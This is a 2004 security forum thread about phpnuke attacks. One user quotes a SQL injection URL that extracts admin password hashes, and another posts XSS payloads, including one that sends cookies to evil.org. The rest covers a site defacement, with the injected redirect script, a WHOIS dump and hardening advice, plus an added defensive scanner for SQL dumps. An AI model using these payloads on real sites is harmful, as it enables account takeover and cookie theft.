IT Security and Insecurity Portal

how to get target password's md5 hash

Posted: Thu May 27, 2004 9:20 am

Saladin
Regular user
Joined: May 26, 2004
Posts: 19

How can I get the password md5 from phpnuke web sites?
I only know one way to get the md5, through the Downloads Module;
here is your http://www.waraxe.us/?modname=sa&id=027 report:
modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0, 0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/ **/radminsuper=1/**/LIMIT/**/1/*
Are there other ways to get the md5?
What if the Downloads Module is not available or is not active? Can I get the md5 through other modules?
@waraxe, help me please, it is so important

xss code here

Posted: Thu May 27, 2004 10:13 am

Saladin
Regular user
Joined: May 26, 2004
Posts: 19

Another question:
[xss code here] (you always write this in your texts, but you give no examples)
What code is that? Maybe you could write some examples?

*sigh*

Posted: Thu May 27, 2004 10:33 am

icenix
Advanced user
Joined: May 13, 2004
Posts: 106
Location: Australia

Google's the best friend here, once again ...
search for XSS Codes or stuff like that
or make your own...
if the <script> tags are not blocked then you could parse something like
Code:
shit'><script>alert(document.cookie)</script>
if that gets blocked then you can always retry the same sort of query
which will give you:
Code:
foobar'><body onload=alert(document.cookie);>
or be creative...
Code:
wateva'><img src="&{alert('CSS Vulnerable')};">
or
f00'><script>document.write('<img src="http://evil.org/'+document.cookie+'") </script>
experiment...
I suggest this site
Hope I helped
ice

Posted: Thu May 27, 2004 3:18 pm

waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

My Site is hacked

Posted: Thu May 27, 2004 6:30 pm

Saladin
Regular user
Joined: May 26, 2004
Posts: 19

My site got hacked.
The hacker had changed the nuke_config table:
INSERT INTO `nuke_config` VALUES ('Hacked By HotHackers Team</title><script language="Javascript">document.location.href="http://hackedby.hothackers.com/?site=mysite.org"</script>', 'http://www.mysite.org', 'logo.gif', '.......
So is this XSS? What has the attacker used? And how could he add new code in my DB ..

Last edited by Saladin on Sun May 30, 2004 7:43 pm; edited 2 times in total

hi

Posted: Thu May 27, 2004 6:32 pm

Saladin
Regular user
Joined: May 26, 2004
Posts: 19

And another question: do you think he has used the News Module to add JavaScript code?
I am not sure, but I think my News Module is not so safe

Posted: Thu May 27, 2004 9:39 pm

waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

First attackers somehow were getting superadmin status (through sql injection probably). Then they just were using from administration menu
an option called "Preferences" and there were inserting "hacked" message and scripting stuff to "Site name" field. What is interesting, is that phpnuke should be filtering "<script>" tags from POST query and stop the pageload with "The html tags you attempted to use are not allowed" message.
One way to bypass that filter is using of the cookie variables to deliver the scripting stuff to phpnuke engine.
Now about defacers:
First, their WHOIS info:
Registration Service Provided By: NameCheap.com
Contact: support@NameCheap.com
Visit: http://www.namecheap.com/
Domain name: HOTHACKERS.COM
Registrant Contact: HOTHACKERS HH TEAM (thcteam_@hotmail.com) +1.5641165647 Fax: no 955 Paris, NA 54114 FR
Administrative Contact: HOTHACKERS HH TEAM (thcteam_@hotmail.com) +1.5641165647 Fax: no 955 Paris, NA 54114 FR
Technical Contact: HOTHACKERS HH TEAM (thcteam_@hotmail.com) +1.5641165647 Fax: no 955 Paris, NA 54114 FR
Billing Contact: HOTHACKERS HH TEAM (thcteam_@hotmail.com) +1.5641165647 Fax: no 955 Paris, NA 54114 FR
Status: Locked
Name Servers: dns1.name-services.com dns2.name-services.com dns3.name-services.com dns4.name-services.com dns5.name-services.com
Creation date: 28 Dec 2003 20:00:13
Expiration date: 28 Dec 2006 20:00:13
Nothing interesting, only email address for possible counteraction.
Then I was doing little research on their website and found one little flaw: "server-info" is available worldwide:
http://www.hothackers.com/server-info
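
Added example, not part of the thread and not phpnuke code: the reply above places the injected script in the "Site name" setting, which is stored in a `nuke_config` row like the one Saladin posted. This Python script scans a SQL dump for values carrying script or markup before a backup is trusted or restored; the pattern list, the function names, the sample rows and the `demo_news` table are assumptions constructed for illustration.

```python
import re

# Heuristic patterns: markup and script that should not appear in plain-text fields.
SUSPICIOUS = re.compile(
    r"<\s*/?\s*(?:script|iframe|body|img|title|meta)\b|\bon\w+\s*=|javascript:"
    r"|document\.(?:location|cookie|write)", re.IGNORECASE)
INSERT_RE = re.compile(r"INSERT INTO `?(\w+)`?[^;]*?VALUES\s*\(", re.IGNORECASE)

def split_values(sql, pos):
    """Parse one VALUES tuple starting just after '('; return (values, end_pos)."""
    values, buf, in_str, i = [], [], False, pos
    while i < len(sql):
        ch = sql[i]
        if in_str:
            # Backslash escape or doubled quote: keep the next character literally.
            if ch == "\\" or (ch == "'" and sql[i + 1:i + 2] == "'"):
                buf.append(sql[i + 1:i + 2]); i += 2; continue
            if ch == "'":
                in_str = False
            else:
                buf.append(ch)
        elif ch == "'":
            in_str = True
        elif ch in ",)":
            values.append("".join(buf).strip()); buf = []
            if ch == ")":
                return values, i + 1
        else:
            buf.append(ch)
        i += 1
    return values, len(sql)  # truncated dump: return what was parsed so far

def scan_dump(sql):
    """Return (table, column_index, matched_token) for each suspicious value."""
    findings = []
    for m in INSERT_RE.finditer(sql):
        pos, more = m.end(), True
        while more:
            values, pos = split_values(sql, pos)
            for col, value in enumerate(values):
                if (hit := SUSPICIOUS.search(value)):
                    findings.append((m.group(1), col, hit.group(0).lower()))
            more = re.match(r"\s*,\s*\(", sql[pos:])  # next row of a multi-row INSERT
            pos += more.end() if more else 0
    return findings

# Constructed sample rows (shortened; placeholder domain, hypothetical demo_news table).
SAMPLE_DUMP = r"""INSERT INTO `nuke_config` VALUES ('Hacked By Example</title><script language="Javascript">document.location.href="http://defacer.example/?site=mysite.org"</script>', 'http://www.mysite.org', 'logo.gif', 10);
INSERT INTO `demo_news` VALUES (1, 'O\'Reilly''s news', 'plain text, no markup'), (2, 'Hi', '<body onload=alert(1)>');"""
```

Calling `scan_dump(SAMPLE_DUMP)` reports column 0 of the `nuke_config` row and column 2 of the second `demo_news` row; a hit means the row needs manual review, not that the rest of the dump is clean.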

hi

Posted: Fri May 28, 2004 4:49 pm

Saladin
Regular user
Joined: May 26, 2004
Posts: 19

Is it possible to add JavaScript without getting SuperAdmin?
I don't believe that they got superadmin rights; I think they have added the JavaScript code directly, or? What do you think?
Although I had changed my password, and I had deleted the admin folder from the server, the attacker could add his JavaScript onLoad to link my site to another directory. How is it possible? I deleted the admin directory, but another time my site was hacked, and the same attacker had again added the JS code on load

_________________ Freedom for Kurdistan

once again

Posted: Fri May 28, 2004 4:51 pm

Saladin
Regular user
Joined: May 26, 2004
Posts: 19

Another, maybe easy, question: if I remove the whole admin folder from the server, is it then possible to hack a phpnuke site and to add new news or JS code?
How can I protect my site surely?

_________________ Freedom for Kurdistan

Posted: Fri May 28, 2004 5:32 pm

waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Maybe you have installed some custom modules with security holes. For example Coppermine Photogallery. If attacker can sploit remote file inclusions, then they can do what they want - modify database, delete files, etc. And that without "admin" folder at scripts at all!
So here is my suggestion -
1. back up your database.
2. delete all scripting stuff from website (to be sure, that there are no backdoors left by crackers).
3. get yourself decently and securely patched phpnuke version.
Look at those php security related sites for download(s):
http://www.nukecops.com
http://www.karakas-online.de/forum/viewforum.php?f=1
http://protector.warcenter.se/
4. when you have installed phpnuke main part, then next try to search add-on modules, you needed, but be sure, that they are known to be secure versions. I mean - do search on bugtraq, ask for advice in forums (like here), etc.
5. install Fortress, UnionTap, whatever you prefer, to automatically catch up the intruder, ban his ip address and send yourself email about intrusion attempt.
6. Consider to secure your admin.php script with help of the allowed/restricted ip addresses/ranges list. There are addons/mods/scripts for this, do a search on google.
7. and finally, when you have all this done, you can ask your friend or hire some IT security freak to pentest your website.

hrmm

Posted: Sat May 29, 2004 6:40 am

icenix
Advanced user
Joined: May 13, 2004
Posts: 106
Location: Australia

maybe change the core values of the body (etc)
and instead of
Code:
http://localhost.com/admin.php
maybe
Code:
http://localhost.com/secretfolder/admin.php
that would stop some attacks I presume?
only for Admin.php though...
modules.php would still be vulnerable and I don't see how you could masquerade that without some serious coding
just a suggestion....

Posted: Sat May 29, 2004 11:51 am

SteX
Advanced user
Joined: May 18, 2004
Posts: 181
Location: Serbia

_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------

Posted: Sat May 29, 2004 2:07 pm

waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

No, because only administration stuff goes to secret folder and only admins will have to access it. All common users will not know about admin directory location at all. And if someone will know admins directory path, then probably it is relative path, not full, therefore it will be relative path disclosure

Posted: Tue Jun 15, 2004 9:27 am

wumaxtreme
Beginner
Joined: Jun 15, 2004
Posts: 1

Posted: Mon Nov 29, 2004 7:01 pm

Oguz
Regular user
Joined: Nov 29, 2004
Posts: 7